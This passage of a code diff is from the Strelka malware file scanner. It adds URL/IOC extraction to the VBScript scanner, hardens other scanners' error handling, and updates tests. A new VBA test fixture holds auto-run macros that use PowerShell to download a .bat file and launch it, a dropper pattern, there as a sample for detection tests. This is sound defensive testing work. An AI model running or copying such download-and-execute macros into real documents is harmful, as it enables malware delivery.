+ r'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|beauty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchannel|cool|coop|corsica|country|coupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|futbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|health|healthcare|help|helsinki|
here|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|scholarships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr|srl|srt|st|stada|staples|star|
starhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))',
+ re.IGNORECASE,
)
- highlight_list = highlight.split(b"\n")
+ def scan(self, data, file, options, expire_at):
+ """
+ Scans the VB script file, tokenizes it, and extracts useful components.
+
+ Args:
+ data: Content of the file being scanned.
+ file: File metadata.
+ options: Scanner options.
+ expire_at: Expiry timestamp of the scan task.
+ """
+        try:
+            # Tokenize the script data using the Pygments lexer
+ highlight = pygments.highlight(
+ data, self.lexer, formatters.RawTokenFormatter()
+ )
+ except Exception as e:
+ self.flags.append(f"highlighting_error: {str(e)[:50]}")
+ return
+
+ try:
+ highlight_list = highlight.split(b"\n")
+ except Exception as e:
+ self.flags.append(f"highlight_split_error: {str(e)[:50]}")
+ return
+
+ # Initialize containers for script components
ordered_highlights = []
+
for hl in highlight_list:
- split_highlight = hl.split(b"\t")
- if len(split_highlight) == 2:
- token = split_highlight[0].decode()
- value = split_highlight[1].decode().strip("'\"").strip()
- highlight_entry = {"token": token, "value": value}
- if highlight_entry["value"]:
- ordered_highlights.append(highlight_entry)
+ try:
+ split_highlight = hl.split(b"\t")
+ if len(split_highlight) == 2:
+ token, value = split_highlight
+ token = token.decode()
+ value = value.decode().strip("'\"").strip()
+ # Add non-empty values to the ordered highlights
+ if value:
+ ordered_highlights.append({"token": token, "value": value})
+ except Exception as e:
+ self.flags.append(f"token_parsing_error: {str(e)[:50]}")
+
+ # Initialize event fields to store extracted data
self.event.setdefault("tokens", [])
self.event.setdefault("comments", [])
self.event.setdefault("functions", [])
self.event.setdefault("names", [])
self.event.setdefault("operators", [])
self.event.setdefault("strings", [])
+ self.event.setdefault("urls", [])
+
+ # Get script length
+ self.event["script_length_bytes"] = len(data)
+
+ # Process and categorize each token
+ try:
+ for ohlp in ordered_highlights:
+ self.categorize_token(ohlp)
+ except Exception as e:
+ self.flags.append(f"token_categorization_error: {str(e)[:50]}")
+
+ # Remove duplicates and add URLs as IOCs
+ try:
+ if self.event["urls"]:
+ self.event["urls"] = list(set(self.event["urls"]))
+ self.add_iocs(self.event["urls"])
+ except Exception as e:
+ self.flags.append(f"ioc_extraction_error: {str(e)[:50]}")
+
+ def categorize_token(self, ohlp):
+ """
+ Categorizes a token and extracts relevant information.
+
+ Args:
+ ohlp: A dictionary containing a token and its value.
+ """
+ token, value = ohlp["token"], ohlp["value"]
+
+ if token not in self.event["tokens"]:
+ self.event["tokens"].append(token)
+
+ if token == "Token.Comment":
+ if value not in self.event["comments"]:
+ self.event["comments"].append(value)
+ self.extract_urls(value)
+
+ elif token == "Token.Name.Function":
+ if value not in self.event["functions"]:
+ self.event["functions"].append(value)
+
+ elif token == "Token.Name":
+ if value not in self.event["names"]:
+ self.event["names"].append(value)
+
+ elif token == "Token.Operator":
+ if value not in self.event["operators"]:
+ self.event["operators"].append(value)
+
+ elif token == "Token.Literal.String":
+ if value not in self.event["strings"]:
+ self.event["strings"].append(value)
+ self.extract_urls(value)
+
+ def extract_urls(self, text):
+ """
+ Extracts URLs from the provided text using regex matching.
- position = 0
- while position < len(ordered_highlights):
- ohlp = ordered_highlights[position]
- if ohlp["token"] not in self.event["tokens"]:
- self.event["tokens"].append(ohlp["token"])
- if ohlp["token"] == "Token.Comment":
- if ohlp["value"] not in self.event["comments"]:
- self.event["comments"].append(ohlp["value"])
- elif ohlp["token"] == "Token.Name.Function":
- if ohlp["value"] not in self.event["functions"]:
- self.event["functions"].append(ohlp["value"])
- elif ohlp["token"] == "Token.Name":
- if ohlp["value"] not in self.event["names"]:
- self.event["names"].append(ohlp["value"])
- elif ohlp["token"] == "Token.Operator":
- if ohlp["value"] not in self.event["operators"]:
- self.event["operators"].append(ohlp["value"])
- elif ohlp["token"] == "Token.Literal.String":
- if ohlp["value"] not in self.event["strings"]:
- self.event["strings"].append(ohlp["value"])
- position += 1
+ Args:
+ text: Text content from which URLs are to be extracted.
+ """
+ try:
+ urls = self.url_regex.findall(text)
+ for url in urls:
+ if url not in self.event["urls"]:
+ self.event["urls"].append(url)
+ except Exception as e:
+ self.flags.append(f"url_extraction_error: {str(e)[:50]}")
diff --git a/src/python/strelka/scanners/scan_vba.py b/src/python/strelka/scanners/scan_vba.py
index fa11de10..c07b8544 100644
--- a/src/python/strelka/scanners/scan_vba.py
+++ b/src/python/strelka/scanners/scan_vba.py
@@ -16,8 +16,8 @@ class ScanVba(strelka.Scanner):
"""
def scan(self, data, file, options, expire_at):
+ vba = None
analyze_macros = options.get("analyze_macros", True)
-
self.event["total"] = {"files": 0, "extracted": 0}
try:
@@ -58,8 +58,13 @@ def scan(self, data, file, options, expire_at):
elif macro_type == "Suspicious":
self.event["suspicious"].append(keyword)
+ if self.event["ioc"]:
+ self.add_iocs(list(set(self.event["ioc"])))
+
except olevba.FileOpenError:
self.flags.append("file_open_error")
+ except AttributeError:
+ self.flags.append("attribute_error")
finally:
- # TODO referenced before potential assignment as vba is opened in a try / catch block
- vba.close()
+ if vba:
+ vba.close()
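
The vba = None sentinel exists because olevba.VBA_Parser() can raise before the variable is ever assigned, in which case the old finally block failed on an undefined name. A hedged sketch of the open/analyze/close flow the scanner wraps (function and variable names here are illustrative):

    from oletools import olevba

    def macro_keywords(name, data):
        vba = None
        try:
            vba = olevba.VBA_Parser(name, data=data)
            if vba.detect_vba_macros():
                return [(kw_type, keyword) for kw_type, keyword, _ in vba.analyze_macros()]
            return []
        except olevba.FileOpenError:
            return None  # the scanner flags "file_open_error" instead
        finally:
            if vba:
                vba.close()
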
diff --git a/src/python/strelka/scanners/scan_zip.py b/src/python/strelka/scanners/scan_zip.py
index 784bb03e..58181043 100644
--- a/src/python/strelka/scanners/scan_zip.py
+++ b/src/python/strelka/scanners/scan_zip.py
@@ -110,7 +110,7 @@ def scan(self, data, file, options, expire_at):
except RuntimeError:
self.flags.append("runtime_error")
except pyzipper.BadZipFile:
- self.flags.append("bad_zip")
+ self.flags.append("bad_zip_file")
except zlib.error:
self.flags.append("zlib_error")
@@ -131,10 +131,15 @@ def scan(self, data, file, options, expire_at):
self.flags.append("zlib_error")
# Top level compression metric
- size_difference_total = file_size_total - compress_size_total
- self.event["compression_rate"] = round(
- (size_difference_total * 100.0) / file_size_total, 2
- )
+ try:
+ size_difference_total = file_size_total - compress_size_total
+ self.event["compression_rate"] = round(
+ (size_difference_total * 100.0) / file_size_total, 2
+ )
+ except ZeroDivisionError:
+ self.flags.append("file_size_zero")
except pyzipper.BadZipFile:
- self.flags.append("bad_zip")
+ self.flags.append("bad_zip_file")
+ except ValueError:
+ self.flags.append("value_error")
diff --git a/src/python/strelka/tests/fixtures/test.pdf b/src/python/strelka/tests/fixtures/test.pdf
old mode 100755
new mode 100644
index 4c147ed2..e4cf4094
Binary files a/src/python/strelka/tests/fixtures/test.pdf and b/src/python/strelka/tests/fixtures/test.pdf differ
diff --git a/src/python/strelka/tests/fixtures/test.vba b/src/python/strelka/tests/fixtures/test.vba
new file mode 100644
index 00000000..dd3300ba
--- /dev/null
+++ b/src/python/strelka/tests/fixtures/test.vba
@@ -0,0 +1,30 @@
+Option Explicit
+Sub AutoOpen()
+'
+' AutoOpen Macro
+'
+
+MsgBox "Hello World!"
+
+End Sub
+
+
+Private Sub Document_Open()
+
+MsgBox "Hello World!"
+
+End Sub
+
+Private Sub Testing_Iocs()
+
+Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
+Set objStartup = objWMIService.Get("Win32_ProcessStartup")
+Set objConfig = objStartup.SpawnInstance_
+objConfig.ShowWindow = 0
+Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
+ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\test.txt
+Start-Process -Filepath $env:tmp\invoice.one"
+ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\test.bat
+Start-Process -Filepath $env:tmp\test.bat"
+
+End Sub
\ No newline at end of file
diff --git a/src/python/strelka/tests/test_scan_ole.py b/src/python/strelka/tests/test_scan_ole.py
index 8867edd1..29c3b821 100644
--- a/src/python/strelka/tests/test_scan_ole.py
+++ b/src/python/strelka/tests/test_scan_ole.py
@@ -57,8 +57,8 @@ def test_scan_ole_doc_pe(mocker):
test_scan_event = {
"elapsed": mock.ANY,
- "flags": ["attribute_error_in_stream"],
- "total": {"streams": 10, "extracted": 9},
+ "flags": [],
+ "total": {"streams": 10, "extracted": 10},
}
scanner_event = run_test_scan(
@@ -79,8 +79,8 @@ def test_scan_ole_doc_pe_classic(mocker):
test_scan_event = {
"elapsed": mock.ANY,
- "flags": ["attribute_error_in_stream"],
- "total": {"streams": 13, "extracted": 12},
+ "flags": [],
+ "total": {"streams": 13, "extracted": 13},
}
scanner_event = run_test_scan(
diff --git a/src/python/strelka/tests/test_scan_pdf.py b/src/python/strelka/tests/test_scan_pdf.py
index 10fd00c0..de5204c7 100644
--- a/src/python/strelka/tests/test_scan_pdf.py
+++ b/src/python/strelka/tests/test_scan_pdf.py
@@ -17,9 +17,84 @@ def test_scan_pdf(mocker):
"elapsed": mock.ANY,
"flags": [],
"images": 1,
- "lines": 34,
- "links": [],
- "words": 418,
+ "lines": 32,
+ "links": unordered(
+ ["http://bing.com", "https://duckduckgo.com", "https://google.com"]
+ ),
+ "words": 421,
+ "xref_object": unordered(
+ [
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>/Border[0 0 0]/Rect[74.8708 81.507 171.716 95.5623]/Subtype/Link/Type/Annot>>",
+ "<>",
+ "[250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 0 0 611 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 444 0 0 0 0 0 0 0 778 0 500 500 0 333 389 0 500]",
+ "<>",
+ "<>",
+ "<>/MediaBox[0 0 612 792]/Parent 2 0 R/Resources<>/Font<>/ProcSet[/PDF/Text/ImageC]/XObject<>>>/StructParents 0/Tabs/S/Type/Page>>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>/Border[0 0 0]/Rect[382.256 32.834 472.048 46.8893]/Subtype/Link/Type/Annot>>",
+ "<>",
+ "<>",
+ "<>",
+ "null",
+ "<>",
+ "<>/Metadata 53 0 R/Pages 2 0 R/StructTreeRoot 15 0 R/Type/Catalog>>",
+ "<>",
+ "<>",
+ "<>",
+ "[46 0 R 47 0 R 48 0 R 49 0 R]",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "[57 0 R]",
+ "<>",
+ "<>",
+ "<>/Filter/FlateDecode/ID[<996084F03FED2848AB7A00AD5BCAA8E6>